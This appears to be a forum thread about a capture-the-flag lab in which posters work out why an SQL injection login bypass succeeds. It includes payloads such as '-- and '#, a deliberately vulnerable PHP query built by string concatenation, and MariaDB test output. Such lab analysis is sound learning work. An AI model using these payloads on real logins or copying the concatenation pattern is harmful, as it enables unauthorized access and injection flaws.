Startingpoint APPOINTMENT SQL query

Hi all,

so I have done the starting point box “appointment” and got a successful sql injection but I do not understand why the query actually works, as to my understanding it should not. Searching for an explanation as I would like to understand it.

In the walkthrough.pdf the query is shown to be:
SELECT * FROM users WHERE username=‘username’ AND password=‘password’

I have entered
username: '–
password: '–

It seems to be a mysql database since the walkthrough states that # is the character for comments and based on SQL injection cheat sheet | Web Security Academy only mysql has that. So my input does not comment out anything and therefore should not work (as long as there is no empty user but I confirmed that there isn´t with other inputs).

Does someone understand why my input works and gives me the flag?

1 Like

If you look closer, you’ll notice that MySQL has more than one way to comment and so
'#
or
'-- (mind the space here, it tripped me up)
will both work to cut the password check part of the clause off.

Hey,
thank you for your response.
I understand that there are multiple ways to comment in mysql and, as you also emphasized in your reply, in mysql the
'–(space)
only works as comment when it is trailed by a space. Thats exactly my problem. It works for me even when just entering
'–
without a trailing space for username and password. But only if I entered it for both parameters at the same time. Thats what I do not understand. Why do I manage to login providing these without spaces?

First off, I stand corrected.

So I ran a test, here’s an excerpt the php code they claim is running:

┌──(joel㉿framework-win)-[~]
└─$ cat appointment.php 
<?php 
$username="'--";
$password="'--";

$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";

echo $sql;

┌──(joel㉿framework-win)-[~]
└─$ php -f ./appointment.php 
SELECT * FROM users WHERE username=''--' AND password=''--'

I created a table:

MariaDB [joel]> create table users (username varchar(255), password varchar(255));
Query OK, 0 rows affected (0.018 sec)

MariaDB [joel]> insert into users values ('admin', 'foobar');
Query OK, 1 row affected (0.002 sec)

And the output:

MariaDB [joel]> SELECT * FROM users WHERE username=''--' AND password=''--'
    -> ;
+----------+----------+
| username | password |
+----------+----------+
| admin    | foobar   |
+----------+----------+

Wait, wtf?

EDIT:

I think this has to have something to do with it.

MariaDB [joel]> SELECT * FROM users WHERE username=''--'';
+----------+----------+
| username | password |
+----------+----------+
| admin    | foobar   |
+----------+----------+
1 row in set, 3 warnings (0.000 sec)

MariaDB [joel]> show warnings;
+---------+------+-------------------------------------------+
| Level   | Code | Message                                   |
+---------+------+-------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin' |
| Warning | 1292 | Truncated incorrect DOUBLE value: ''      |
| Warning | 1292 | Truncated incorrect DOUBLE value: ''      |
+---------+------+-------------------------------------------+
3 rows in set (0.000 sec)